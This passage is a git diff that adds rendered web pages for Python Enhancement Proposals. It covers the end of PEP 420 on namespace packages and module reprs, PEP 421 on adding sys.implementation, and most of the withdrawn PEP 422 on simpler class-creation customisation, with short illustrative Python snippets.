+
+

Dynamic path computation

+

Guido raised a concern that automatic dynamic path computation was an +unnecessary feature [8]. Later in that thread, PJ Eby and Alyssa +Coghlan presented arguments as to why dynamic computation would +minimize surprise to Python users. The conclusion of that discussion +has been included in this PEP’s Rationale section.

+

An earlier version of this PEP required that dynamic path computation could only take effect if the parent path object were modified in-place. That is, this would work:

+
sys.path.append('new-dir')
+
+
+

But this would not:

+
sys.path = sys.path + ['new-dir']
+
+
+

In the same thread [8], it was pointed out that this restriction is +not required. If the parent path is looked up by name instead of by +holding a reference to it, then there is no restriction on how the +parent path is modified or replaced. For a top-level namespace +package, the lookup would be the module named "sys" then its +attribute "path". For a namespace package nested inside a package +foo, the lookup would be for the module named "foo" then its +attribute "__path__".

+
+
+
+

Module reprs

+

Previously, module reprs were hard coded based on assumptions about a module’s +__file__ attribute. If this attribute existed and was a string, it was +assumed to be a file system path, and the module object’s repr would include +this in its value. The only exception was that PEP 302 reserved missing +__file__ attributes to built-in modules, and in CPython, this assumption +was baked into the module object’s implementation. Because of this +restriction, some modules contained contrived __file__ values that did not +reflect file system paths, and which could cause unexpected problems later +(e.g. os.path.join() on a non-path __file__ would return gibberish).

+

This PEP relaxes this constraint, and leaves the setting of __file__ to +the purview of the loader producing the module. Loaders may opt to leave +__file__ unset if no file system path is appropriate. Loaders may also +set additional reserved attributes on the module if useful. This means that +the definitive way to determine the origin of a module is to check its +__loader__ attribute.

+

For example, namespace packages as described in this PEP will have no +__file__ attribute because no corresponding file exists. In order to +provide flexibility and descriptiveness in the reprs of such modules, a new +optional protocol is added to PEP 302 loaders. Loaders can implement a +module_repr() method which takes a single argument, the module object. +This method should return the string to be used verbatim as the repr of the +module. The rules for producing a module repr are now standardized as:

+
    +
  • If the module has an __loader__ and that loader has a module_repr() +method, call it with a single argument, which is the module object. The +value returned is used as the module’s repr.
  • +
  • If an exception occurs in module_repr(), the exception is +caught and discarded, and the calculation of the module’s repr +continues as if module_repr() did not exist.
  • +
  • If the module has an __file__ attribute, this is used as part of the +module’s repr.
  • +
  • If the module has no __file__ but does have an __loader__, then the +loader’s repr is used as part of the module’s repr.
  • +
  • Otherwise, just use the module’s __name__ in the repr.
  • +
+

Here is a snippet showing how a namespace module’s repr is calculated from its loader:

+
class NamespaceLoader:
+    @classmethod
+    def module_repr(cls, module):
+        return "<module '{}' (namespace)>".format(module.__name__)
+
+
+

Built-in module reprs would no longer need to be hard-coded, but +instead would come from their loader as well:

+
class BuiltinImporter:
+    @classmethod
+    def module_repr(cls, module):
+        return "<module '{}' (built-in)>".format(module.__name__)
+
+
+

Here are some example reprs of different types of modules with +different sets of the related attributes:

+
>>> import email
+>>> email
+<module 'email' from '/home/barry/projects/python/pep-420/Lib/email/__init__.py'>
+>>> m = type(email)('foo')
+>>> m
+<module 'foo'>
+>>> m.__file__ = 'zippy:/de/do/dah'
+>>> m
+<module 'foo' from 'zippy:/de/do/dah'>
+>>> class Loader: pass
+...
+>>> m.__loader__ = Loader
+>>> del m.__file__
+>>> m
+<module 'foo' (<class '__main__.Loader'>)>
+>>> class NewLoader:
+...   @classmethod
+...   def module_repr(cls, module):
+...      return '<mystery module!>'
+...
+>>> m.__loader__ = NewLoader
+>>> m
+<mystery module!>
+>>>
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0420.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0421/index.html b/pep-0421/index.html new file mode 100644 index 00000000000..16adf79eb96 --- /dev/null +++ b/pep-0421/index.html @@ -0,0 +1,631 @@ + + + + + + + + PEP 421 – Adding sys.implementation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 421 – Adding sys.implementation

+
+
Author:
+
Eric Snow <ericsnowcurrently at gmail.com>
+
BDFL-Delegate:
+
Barry Warsaw
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Apr-2012
+
Python-Version:
+
3.3
+
Post-History:
+
26-Apr-2012
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP introduces a new attribute for the sys module: +sys.implementation. The attribute holds consolidated information +about the implementation of the running interpreter. Thus +sys.implementation is the source to which the standard library may +look for implementation-specific information.

+

The proposal in this PEP is in line with a broader emphasis on making +Python friendlier to alternate implementations. It describes the new +variable and the constraints on what that variable contains. The PEP +also explains some immediate use cases for sys.implementation.

+
+
+

Motivation

+

For a number of years now, the distinction between Python-the-language +and CPython (the reference implementation) has been growing. Most of +this change is due to the emergence of Jython, IronPython, and PyPy as +viable alternate implementations of Python.

+

Consider, however, the nearly two decades of CPython-centric Python +(i.e. most of its existence). That focus has understandably +contributed to quite a few CPython-specific artifacts both in the +standard library and exposed in the interpreter. Though the core +developers have made an effort in recent years to address this, quite +a few of the artifacts remain.

+

Part of the solution is presented in this PEP: a single namespace in +which to consolidate implementation specifics. This will help focus +efforts to differentiate the implementation specifics from the +language. Additionally, it will foster a multiple-implementation +mindset.

+
+
+

Proposal

+

We will add a new attribute to the sys module, called +sys.implementation, as an object with attribute-access (as opposed +to a mapping). It will contain implementation-specific information.

+

The attributes of this object will remain fixed during interpreter +execution and through the course of an implementation version. This +ensures that behaviors which depend on attributes of sys.implementation +don’t change between versions.

+

The object has each of the attributes described in the Required +Attributes section below. Those attribute names will never start +with an underscore. The standard library and the language definition +will rely only on those required attributes.

+

This proposal takes a conservative approach in requiring only a small +number of attributes. As more become appropriate, they may be added +with discretion, as described in Adding New Required Attributes.

+

While this PEP places no other constraints on sys.implementation, +it also recommends that no one rely on capabilities outside those +described here. The only exception to that recommendation is for +attributes starting with an underscore. Implementers may use those +as appropriate to store per-implementation data.

+
+

Required Attributes

+

These are attributes in sys.implementation on which the standard +library and language definition will rely, meaning implementers must +define them:

+
+
name
A lower-case identifier representing the implementation. Examples +include ‘pypy’, ‘jython’, ‘ironpython’, and ‘cpython’.
+
version
The version of the implementation, as opposed to the version of the +language it implements. This value conforms to the format described +in Version Format.
+
hexversion
The version of the implementation in the same hexadecimal format as +sys.hexversion.
+
cache_tag
A string used for the PEP 3147 cache tag. It would +normally be a composite of the name and version (e.g. ‘cpython-33’ +for CPython 3.3). However, an implementation may explicitly use a +different cache tag. If cache_tag is set to None, it indicates +that module caching should be disabled.
+
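
For example, on a CPython 3.3 interpreter the required attributes could look like this (values are illustrative):

>>> import sys
>>> sys.implementation.name
'cpython'
>>> sys.implementation.version
sys.version_info(major=3, minor=3, micro=0, releaselevel='final', serial=0)
>>> hex(sys.implementation.hexversion)
'0x30300f0'
>>> sys.implementation.cache_tag
'cpython-33'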
+
+
+

Adding New Required Attributes

+

In time more required attributes will be added to +sys.implementation. However, each must have a meaningful use case +across all Python implementations in order to be considered. This is +made most clear by a use case in the standard library or language +specification.

+

All proposals for new required attributes will go through the normal +PEP process. Such a PEP need not be long, just long enough. It will +need to sufficiently spell out the rationale for the new attribute, +its use cases, and the impact it will have on the various Python +implementations.

+
+
+

Version Format

+

A main point of sys.implementation is to contain information that +will be used internally in the standard library. In order to +facilitate the usefulness of the version attribute, its value should +be in a consistent format across implementations.

+

As such, the format of sys.implementation.version will follow that +of sys.version_info, which is effectively a named tuple. It is a +familiar format and generally consistent with normal version format +conventions.
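
The distinction matters most for alternate implementations, where the two values can differ (illustrative numbers for a hypothetical PyPy build):

>>> import sys
>>> sys.implementation.version[:3]   # version of the implementation
(2, 0, 0)
>>> sys.version_info[:3]             # version of the language implemented
(3, 2, 3)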

+
+
+
+

Rationale

+

The status quo for implementation-specific information gives us that +information in a more fragile, harder to maintain way. It is spread +out over different modules or inferred from other information, as we +see with platform.python_implementation().

+

This PEP is the main alternative to that approach. It consolidates +the implementation-specific information into a single namespace and +makes explicit that which was implicit.

+
+

Type Considerations

+

It’s very easy to get bogged down in discussions about the type of +sys.implementation. However, its purpose is to support the +standard library and language definition. As such, there isn’t much +that really matters regarding its type, as opposed to a feature that +would be more generally used. Thus characteristics like immutability +and sequence-ness have been disregarded.

+

The only real choice has been between an object with attribute access +and a mapping with item access. This PEP espouses dotted access to +reflect the relatively fixed nature of the namespace.

+
+
+

Non-Required Attributes

+

Earlier versions of this PEP included a required attribute called +metadata that held any non-required, per-implementation data +[12]. However, this proved to be an unnecessary addition +considering the purpose of sys.implementation.

+

Ultimately, non-required attributes are virtually ignored in this PEP. +They have no impact other than that careless use may collide with +future required attributes. That, however, is but a marginal concern +for sys.implementation.

+
+
+

Why a Part of sys?

+

The sys module holds the new namespace because sys is the depot +for interpreter-centric variables and functions. Many +implementation-specific attributes are already found in sys.

+
+
+

Why Strict Constraints on Any of the Values?

+

As already noted in Version Format, values in +sys.implementation are intended for use by the standard library. +Constraining those values, essentially specifying an API for them, +allows them to be used consistently, regardless of how they are +otherwise implemented. However, care should be taken to not +over-specify the constraints.

+
+
+
+

Discussion

+

The topic of sys.implementation came up on the python-ideas list +in 2009, where the reception was broadly positive [1]. I +revived the discussion recently while working on a pure-python +imp.get_tag() [2]. Discussion has been ongoing +[3]. The messages in issue #14673 are also relevant.

+

A good part of the recent discussion centered on the type to use for +sys.implementation.

+
+
+

Use-cases

+
+

platform.python_implementation()

+

“explicit is better than implicit”

+

The platform module determines the python implementation by looking +for clues in a couple different sys variables [9]. However, +this approach is fragile, requiring changes to the standard library +each time an implementation changes. Beyond that, support in +platform is limited to those implementations that core developers +have blessed by special-casing them in the platform module.

+

With sys.implementation the various implementations would +explicitly set the values in their own version of the sys +module.

+

Another concern is that the platform module is part of the stdlib, +which ideally should minimize implementation details such as those that +would be moved to sys.implementation.

+

Any overlap between sys.implementation and the platform module +would simply defer to sys.implementation (with the same interface +in platform wrapping it).
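
A sketch of what that wrapping might look like (the display-name mapping is an illustrative assumption):

import sys

_DISPLAY_NAMES = {
    'cpython': 'CPython',
    'ironpython': 'IronPython',
    'jython': 'Jython',
    'pypy': 'PyPy',
}

def python_implementation():
    # Defer to sys.implementation instead of guessing from
    # clues in sys.version and friends.
    name = sys.implementation.name
    return _DISPLAY_NAMES.get(name, name)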

+
+
+

Cache Tag Generation in Frozen Importlib

+

PEP 3147 defined the use of a module cache and cache tags for file +names. The importlib bootstrap code, frozen into the Python binary as +of 3.3, uses the cache tags during the import process. Part of the +project to bootstrap importlib has been to clean code out of +Python/import.c that did not need to be there any longer.

+

The cache tag defined in Python/import.c was +hard-coded +to "cpython" MAJOR MINOR. For importlib the options are +either hard-coding it in the same way, or guessing the implementation +in the same way as does platform.python_implementation().

+

As long as the hard-coded tag is limited to CPython-specific code, it +is livable. However, inasmuch as other Python implementations use the +importlib code to work with the module cache, a hard-coded tag would +become a problem.

+

Directly using the platform module in this case is a non-starter. +Any module used in the importlib bootstrap must be built-in or frozen, +neither of which apply to the platform module. This is the point +that led to the recent interest in sys.implementation.

+

Regardless of the outcome for the implementation name used, another +problem relates to the version used in the cache tag. That version is +likely to be the implementation version rather than the language +version. However, the implementation version is not readily +identified anywhere in the standard library.
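
Both problems disappear once frozen importlib can consult sys.implementation directly, as in this sketch (the helper name is hypothetical):

import sys

def _cached_filename(module_name):
    # e.g. 'foo' -> '__pycache__/foo.cpython-33.pyc' on CPython 3.3
    tag = sys.implementation.cache_tag
    if tag is None:
        # cache_tag == None means module caching is disabled
        raise NotImplementedError('bytecode caching is disabled')
    return '__pycache__/{}.{}.pyc'.format(module_name, tag)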

+
+
+

Implementation-Specific Tests

+

Currently there are a number of implementation-specific tests in the +test suite under Lib/test. The test support module +(Lib/test/support.py) provides some functionality for dealing with +these tests. However, like the platform module, test.support +must do some guessing that sys.implementation would render +unnecessary.

+
+
+

Jython’s os.name Hack

+

In Jython, os.name is set to ‘java’ to accommodate special +treatment of the java environment in the standard library [10] +[11]. Unfortunately it masks the os name that would otherwise +go there. sys.implementation would help obviate the need for this +special case. Currently Jython sets os._name for the normal +os.name value.
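
With sys.implementation available, such code could test the implementation explicitly and leave os.name alone (an illustrative sketch):

import sys

if sys.implementation.name == 'jython':
    pass  # Java-platform-specific handling goes here
else:
    pass  # os.name keeps its normal, unmasked meaning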

+
+
+

The Problem With sys.(version|version_info|hexversion)

+

Earlier versions of this PEP made the mistake of calling +sys.version_info (and friends) the version of the Python language, +in contrast to the implementation. However, this is not the case. +Instead, it is the version of the CPython implementation. Incidentally, +the first two components of sys.version_info (major and minor) also +reflect the version of the language definition.

+

As Barry Warsaw noted, the “semantics of sys.version_info have been +sufficiently squishy in the past” [13]. With +sys.implementation we have the opportunity to improve this +situation by first establishing an explicit location for the version of +the implementation.

+

This PEP makes no other effort to directly clarify the semantics of +sys.version_info. Regardless, having an explicit version for the +implementation will definitely help to clarify the distinction from the +language version.

+
+
+
+

Feedback From Other Python Implementers

+
+

IronPython

+

Jeff Hardy responded to a request for feedback [4]. He +said, “I’ll probably add it the day after it’s approved” +[5]. He also gave useful feedback on both the type of +sys.implementation and on the metadata attribute (which has +since been removed from the PEP).

+
+
+

Jython

+

In 2009 Frank Wierzbicki said this (relative to Jython implementing the +required attributes) [6]:

+
Speaking for Jython, so far it looks like something we would adopt
+soonish after it was accepted (it looks pretty useful to me).
+
+
+
+
+

PyPy

+

Some of the PyPy developers have responded to a request for feedback +[7]. Armin Rigo said the following [8]:

+
For myself, I can only say that it looks like a good idea, which we
+will happily adhere to when we migrate to Python 3.3.
+
+
+

He also expressed support for keeping the required list small. Both +Armin and Laura Creighton indicated that an effort to better catalog +Python’s implementation would be welcome. Such an effort, for which +this PEP is a small start, will be considered separately.

+
+
+
+

Past Efforts

+
+

PEP 3139

+

PEP 3139, from 2008, recommended a clean-up of the sys module in +part by extracting implementation-specific variables and functions +into a separate module. PEP 421 is a less ambitious version of that +idea. While PEP 3139 was rejected, its goals are reflected in PEP 421 +to a large extent, though with a much lighter approach.

+
+
+

PEP 399

+

PEP 399 dictates policy regarding the standard library, helping to make +it friendlier to alternate implementations. PEP 421 is proposed in +that same spirit.

+
+
+
+

The Bigger Picture

+

It’s worth noting again that this PEP is a small part of a larger +ongoing effort to identify the implementation-specific parts of Python +and mitigate their impact on alternate implementations.

+

sys.implementation is a focal point for implementation-specific +data, acting as a nexus for cooperation between the language, the +standard library, and the different implementations. As time goes by +it is feasible that sys.implementation will assume current +attributes of sys and other builtin/stdlib modules, where +appropriate. In this way, it is a PEP 3139-lite, but starting as +small as possible.

+

However, as already noted, many other efforts predate +sys.implementation. Neither is it necessarily a major part of the +effort. Rather, consider it as part of the infrastructure of the +effort to make Python friendlier to alternate implementations.

+
+
+

Alternatives

+

Since the single-namespace-under-sys approach is relatively +straightforward, no alternatives have been considered for this PEP.

+
+
+

Examples of Other Attributes

+

These are examples only and not part of the proposal. Most of them +were suggested during previous discussions, but did not fit into the +goals of this PEP. (See Adding New Required Attributes if they get +you excited.)

+
+
common_name
The case-sensitive name by which the implementation is known.
+
vcs_url
A URL for the main VCS repository for the implementation project.
+
vcs_revision_id
A value that identifies the VCS revision of the implementation.
+
build_toolchain
The tools used to build the interpreter.
+
build_date
The timestamp of when the interpreter was built.
+
homepage
The URL of the implementation’s website.
+
site_prefix
The preferred site prefix for the implementation.
+
runtime
The run-time environment in which the interpreter is running, as +in “Common Language Runtime” (.NET CLR) or “Java Runtime +Executable”.
+
gc_type
The type of garbage collection used, like “reference counting” or +“mark and sweep”.
+
+
+
+

Open Issues

+

Currently none.

+
+
+

Implementation

+

The implementation of this PEP is covered in issue #14673.

+
+
+

References

+ + + + + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0421.rst

+

Last modified: 2024-12-06 18:17:22 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0422/index.html b/pep-0422/index.html new file mode 100644 index 00000000000..3dcf2117962 --- /dev/null +++ b/pep-0422/index.html @@ -0,0 +1,660 @@ + + + + + + + + PEP 422 – Simpler customisation of class creation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 422 – Simpler customisation of class creation

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, +Daniel Urban <urban.dani+py at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
05-Jun-2012
+
Python-Version:
+
3.5
+
Post-History:
+
05-Jun-2012, 10-Feb-2013
+
+
+
+
Table of Contents +
+
+

Abstract

+

Currently, customising class creation requires the use of a custom metaclass. +This custom metaclass then persists for the entire lifecycle of the class, +creating the potential for spurious metaclass conflicts.

+

This PEP proposes to instead support a wide range of customisation +scenarios through a new namespace parameter in the class header, and +a new __autodecorate__ hook in the class body.

+

The new mechanism should be easier to understand and use than +implementing a custom metaclass, and thus should provide a gentler +introduction to the full power of Python’s metaclass machinery.

+
+
+

PEP Withdrawal

+

This proposal has been withdrawn in favour of Martin Teichmann’s proposal +in PEP 487, which achieves the same goals through a simpler, easier to use +__init_subclass__ hook that simply isn’t invoked for the base class +that defines the hook.

+
+
+

Background

+

For an already created class cls, the term “metaclass” has a clear +meaning: it is the value of type(cls).

+

During class creation, it has another meaning: it is also used to refer to +the metaclass hint that may be provided as part of the class definition. +While in many cases these two meanings end up referring to one and the same +object, there are two situations where that is not the case:

+
    +
  • If the metaclass hint refers to an instance of type, then it is +considered as a candidate metaclass along with the metaclasses of all of +the parents of the class being defined. If a more appropriate metaclass is +found amongst the candidates, then it will be used instead of the one +given in the metaclass hint.
  • +
  • Otherwise, an explicit metaclass hint is assumed to be a factory function +and is called directly to create the class object. In this case, the final +metaclass will be determined by the factory function definition. In the +typical case (where the factory functions just calls type, or, in +Python 3.3 or later, types.new_class) the actual metaclass is then +determined based on the parent classes.
  • +
+

It is notable that only the actual metaclass is inherited - a factory +function used as a metaclass hook sees only the class currently being +defined, and is not invoked for any subclasses.

+

In Python 3, the metaclass hint is provided using the metaclass=Meta +keyword syntax in the class header. This allows the __prepare__ method +on the metaclass to be used to create the locals() namespace used during +execution of the class body (for example, specifying the use of +collections.OrderedDict instead of a regular dict).

+

In Python 2, there was no __prepare__ method (that API was added for +Python 3 by PEP 3115). Instead, a class body could set the __metaclass__ +attribute, and the class creation process would extract that value from the +class namespace to use as the metaclass hint. There is published code that +makes use of this feature.

+

Another new feature in Python 3 is the zero-argument form of the super() +builtin, introduced by PEP 3135. This feature uses an implicit __class__ +reference to the class being defined to replace the “by name” references +required in Python 2. Just as code invoked during execution of a Python 2 +metaclass could not call methods that referenced the class by name (as the +name had not yet been bound in the containing scope), similarly, Python 3 +metaclasses cannot call methods that rely on the implicit __class__ +reference (as it is not populated until after the metaclass has returned +control to the class creation machinery).

+

Finally, when a class uses a custom metaclass, it can pose additional +challenges to the use of multiple inheritance, as a new class cannot +inherit from parent classes with unrelated metaclasses. This means that +it is impossible to add a metaclass to an already published class: such +an addition is a backwards incompatible change due to the risk of metaclass +conflicts.

+
+
+

Proposal

+

This PEP proposes that a new mechanism to customise class creation be +added to Python 3.4 that meets the following criteria:

+
    +
  1. Integrates nicely with class inheritance structures (including mixins and +multiple inheritance)
  2. +
  3. Integrates nicely with the implicit __class__ reference and +zero-argument super() syntax introduced by PEP 3135
  4. +
  5. Can be added to an existing base class without a significant risk of +introducing backwards compatibility problems
  6. +
  7. Restores the ability for class namespaces to have some influence on the +class creation process (above and beyond populating the namespace itself), +but potentially without the full flexibility of the Python 2 style +__metaclass__ hook
  8. +
+

One mechanism that can achieve this goal is to add a new implicit class +decoration hook, modelled directly on the existing explicit class +decorators, but defined in the class body or in a parent class, rather than +being part of the class definition header.

+

Specifically, it is proposed that class definitions be able to provide a +class initialisation hook as follows:

+
class Example:
+    def __autodecorate__(cls):
+        # This is invoked after the class is created, but before any
+        # explicit decorators are called
+        # The usual super() mechanisms are used to correctly support
+        # multiple inheritance. The class decorator style signature helps
+        # ensure that invoking the parent class is as simple as possible.
+        cls = super().__autodecorate__()
+        return cls
+
+
+

To simplify the cooperative multiple inheritance case, object will gain +a default implementation of the hook that returns the class unmodified:

+
class object:
+    def __autodecorate__(cls):
+        return cls
+
+
+

If a metaclass wishes to block implicit class decoration for some reason, it +must arrange for cls.__autodecorate__ to trigger AttributeError.
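
One way a metaclass might arrange that, sketched under the semantics proposed here (the lookup details are an assumption, not settled API):

class BlockAutoDecorate(type):
    def __getattribute__(cls, name):
        # Make cls.__autodecorate__ raise AttributeError, so the
        # class creation machinery skips the implicit decoration.
        if name == '__autodecorate__':
            raise AttributeError(name)
        return super().__getattribute__(name)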

+

If present on the created object, this new hook will be called by the class +creation machinery after the __class__ reference has been initialised. +For types.new_class(), it will be called as the last step before +returning the created class object. __autodecorate__ is implicitly +converted to a class method when the class is created (prior to the hook +being invoked).

+

Note that when __autodecorate__ is called, the name of the class is not +yet bound to the new class object. As a consequence, the two argument form +of super() cannot be used to call methods (e.g., super(Example, cls) +wouldn’t work in the example above). However, the zero argument form of +super() works as expected, since the __class__ reference is already +initialised.

+

This general proposal is not a new idea (it was first suggested for +inclusion in the language definition more than 10 years ago, and a +similar mechanism has long been supported by Zope’s ExtensionClass), +but the situation has changed sufficiently in recent years that +the idea is worth reconsidering for inclusion as a native language feature.

+

In addition, the introduction of the metaclass __prepare__ method in PEP +3115 allows a further enhancement that was not possible in Python 2: this +PEP also proposes that type.__prepare__ be updated to accept a factory +function as a namespace keyword-only argument. If present, the value +provided as the namespace argument will be called without arguments +to create the result of type.__prepare__ instead of using a freshly +created dictionary instance. For example, the following will use +an ordered dictionary as the class namespace:

+
class OrderedExample(namespace=collections.OrderedDict):
+    def __autodecorate__(cls):
+        # cls.__dict__ is still a read-only proxy to the class namespace,
+        # but the underlying storage is an OrderedDict instance
+
+
+
+

Note

+

This PEP, along with the existing ability to use __prepare__ to share a +single namespace amongst multiple class objects, highlights a possible +issue with the attribute lookup caching: when the underlying mapping is +updated by other means, the attribute lookup cache is not invalidated +correctly (this is a key part of the reason class __dict__ attributes +produce a read-only view of the underlying storage).

+

Since the optimisation provided by that cache is highly desirable, +the use of a preexisting namespace as the class namespace may need to +be declared as officially unsupported (since the observed behaviour is +rather strange when the caches get out of sync).

+
+
+
+

Key Benefits

+
+

Easier use of custom namespaces for a class

+

Currently, to use a different type (such as collections.OrderedDict) for +a class namespace, or to use a pre-populated namespace, it is necessary to +write and use a custom metaclass. With this PEP, using a custom namespace +becomes as simple as specifying an appropriate factory function in the +class header.

+
+
+

Easier inheritance of definition time behaviour

+

Understanding Python’s metaclasses requires a deep understanding of +the type system and the class construction process. This is legitimately +seen as challenging, due to the need to keep multiple moving parts (the code, +the metaclass hint, the actual metaclass, the class object, instances of the +class object) clearly distinct in your mind. Even when you know the rules, +it’s still easy to make a mistake if you’re not being extremely careful. +An earlier version of this PEP actually included such a mistake: it +stated “subclass of type” for a constraint that is actually “instance of +type”.

+

Understanding the proposed implicit class decoration hook only requires +understanding decorators and ordinary method inheritance, which isn’t +quite as daunting a task. The new hook provides a more gradual path +towards understanding all of the phases involved in the class definition +process.

+
+
+

Reduced chance of metaclass conflicts

+

One of the big issues that makes library authors reluctant to use metaclasses +(even when they would be appropriate) is the risk of metaclass conflicts. +These occur whenever two unrelated metaclasses are used by the desired +parents of a class definition. This risk also makes it very difficult to +add a metaclass to a class that has previously been published without one.

+

By contrast, adding an __autodecorate__ method to an existing type poses +a similar level of risk to adding an __init__ method: technically, there +is a risk of breaking poorly implemented subclasses, but when that occurs, +it is recognised as a bug in the subclass rather than the library author +breaching backwards compatibility guarantees. In fact, due to the constrained +signature of __autodecorate__, the risk in this case is actually even +lower than in the case of __init__.

+
+
+

Integrates cleanly with PEP 3135

+

Unlike code that runs as part of the metaclass, code that runs as part of +the new hook will be able to freely invoke class methods that rely on the +implicit __class__ reference introduced by PEP 3135, including methods +that use the zero argument form of super().

+
+
+

Replaces many use cases for dynamic setting of __metaclass__

+

For use cases that don’t involve completely replacing the defined class, +Python 2 code that dynamically set __metaclass__ can now dynamically +set __autodecorate__ instead. For more advanced use cases, introduction of +an explicit metaclass (possibly made available as a required base class) will +still be necessary in order to support Python 3.

+
+
+
+

Design Notes

+
+

Determining if the class being decorated is the base class

+

In the body of an __autodecorate__ method, as in any other class method, +__class__ will be bound to the class declaring the method, while the +value passed in may be a subclass.

+

This makes it relatively straightforward to skip processing the base class +if necessary:

+
class Example:
+    def __autodecorate__(cls):
+        cls = super().__autodecorate__()
+        # Don't process the base class
+        if cls is __class__:
+            return
+        # Process subclasses here
+        ...
+
+
+
+
+

Replacing a class with a different kind of object

+

As an implicit decorator, __autodecorate__ is able to relatively easily +replace the defined class with a different kind of object. Technically +custom metaclasses and even __new__ methods can already do this +implicitly, but the decorator model makes such code much easier to understand +and implement.

+
class BuildDict:
+    def __autodecorate__(cls):
+        cls = super().__autodecorate__()
+        # Don't process the base class
+        if cls is __class__:
+            return
+        # Convert subclasses to ordinary dictionaries
+        return cls.__dict__.copy()
+
+
+

It’s not clear why anyone would ever do this implicitly based on inheritance +rather than just using an explicit decorator, but the possibility seems worth +noting.

+
+
+
+

Open Questions

+
+

Is the namespace concept worth the extra complexity?

+

Unlike the new __autodecorate__ hook, the proposed namespace keyword +argument is not automatically inherited by subclasses. Given the way this +proposal is currently written, the only way to get a special namespace used +consistently in subclasses is still to write a custom metaclass with a +suitable __prepare__ implementation.

+

Changing the custom namespace factory to also be inherited would +significantly increase the complexity of this proposal, and introduce a +number of the same potential base class conflict issues as arise with the +use of custom metaclasses.

+

Eric Snow has put forward a +separate proposal +to instead make the execution namespace for class bodies an ordered dictionary +by default, and capture the class attribute definition order for future +reference as an attribute (e.g. __definition_order__) on the class object.

+

Eric’s suggested approach may be a better choice for a new default behaviour +for type that combines well with the proposed __autodecorate__ hook, +leaving the more complex configurable namespace factory idea to a custom +metaclass like the one shown below.

+
+
+
+

New Ways of Using Classes

+

The new namespace keyword in the class header enables a number of +interesting options for controlling the way a class is initialised, +including some aspects of the object models of both JavaScript and Ruby.

+

All of the examples below are actually possible today through the use of a +custom metaclass:

+
class CustomNamespace(type):
+    @classmethod
+    def __prepare__(meta, name, bases, *, namespace=None, **kwds):
+        parent_namespace = super().__prepare__(name, bases, **kwds)
+        return namespace() if namespace is not None else parent_namespace
+    def __new__(meta, name, bases, ns, *, namespace=None, **kwds):
+        return super().__new__(meta, name, bases, ns, **kwds)
+    def __init__(cls, name, bases, ns, *, namespace=None, **kwds):
+        return super().__init__(name, bases, ns, **kwds)
+
+
+

The advantage of implementing the new keyword directly in +type.__prepare__ is that the only persistent effect is then +the change in the underlying storage of the class attributes. The metaclass +of the class remains unchanged, eliminating many of the drawbacks +typically associated with these kinds of customisations.

+
+

Order preserving classes

+
class OrderedClass(namespace=collections.OrderedDict):
+    a = 1
+    b = 2
+    c = 3
+
+
+
+
+

Prepopulated namespaces

+
seed_data = dict(a=1, b=2, c=3)
+class PrepopulatedClass(namespace=seed_data.copy):
+    pass
+
+
+
+
+

Cloning a prototype class

+
class NewClass(namespace=Prototype.__dict__.copy):
+    pass
+
+
+
+
+

Extending a class

+
+

Note

+

Just because the PEP makes it possible to do this relatively +cleanly doesn’t mean anyone should do this!

+
+
from collections import MutableMapping
+
+# The MutableMapping + dict combination should give something that
+# generally behaves correctly as a mapping, while still being accepted
+# as a class namespace
+class ClassNamespace(MutableMapping, dict):
+    def __init__(self, cls):
+        self._cls = cls
+    def __len__(self):
+        return len(dir(self._cls))
+    def __iter__(self):
+        for attr in dir(self._cls):
+            yield attr
+    def __contains__(self, attr):
+        return hasattr(self._cls, attr)
+    def __getitem__(self, attr):
+        return getattr(self._cls, attr)
+    def __setitem__(self, attr, value):
+        setattr(self._cls, attr, value)
+    def __delitem__(self, attr):
+        delattr(self._cls, attr)
+
+def extend(cls):
+    return lambda: ClassNamespace(cls)
+
+class Example:
+    pass
+
+class ExtendedExample(namespace=extend(Example)):
+    a = 1
+    b = 2
+    c = 3
+
+>>> Example.a, Example.b, Example.c
+(1, 2, 3)
+
+
+
+
+
+

Rejected Design Options

+
+

Calling __autodecorate__ from type.__init__

+

Calling the new hook automatically from type.__init__ would achieve most +of the goals of this PEP. However, using that approach would mean that +__autodecorate__ implementations would be unable to call any methods that +relied on the __class__ reference (or used the zero-argument form of +super()), and could not make use of those features themselves.

+

The current design instead ensures that the implicit decorator hook is able +to do anything an explicit decorator can do by running it after the initial +class creation is already complete.

+
+
+

Calling the automatic decoration hook __init_class__

+

Earlier versions of the PEP used the name __init_class__ for the name +of the new hook. There were three significant problems with this name:

+
    +
  • it was hard to remember if the correct spelling was __init_class__ or +__class_init__
  • +
  • the use of “init” in the name suggested the signature should match that +of type.__init__, which is not the case
  • +
  • the use of “init” in the name suggested the method would be run as part +of initial class object creation, which is not the case
  • +
+

The new name __autodecorate__ was chosen to make it clear that the new +initialisation hook is most usefully thought of as an implicitly invoked +class decorator, rather than as being like an __init__ method.

+
+
+

Requiring an explicit decorator on __autodecorate__

+

Originally, this PEP required the explicit use of @classmethod on the +__autodecorate__ decorator. It was made implicit since there’s no +sensible interpretation for leaving it out, and that case would need to be +detected anyway in order to give a useful error message.

+

This decision was reinforced after noticing that the user experience of +defining __prepare__ and forgetting the @classmethod method +decorator is singularly incomprehensible (particularly since PEP 3115 +documents it as an ordinary method, and the current documentation doesn’t +explicitly say anything one way or the other).

+
+
+

Making __autodecorate__ implicitly static, like __new__

+

While it accepts the class to be instantiated as the first argument, +__new__ is actually implicitly treated as a static method rather than +as a class method. This allows it to be readily extracted from its +defining class and called directly on a subclass, rather than being +coupled to the class object it is retrieved from.

+

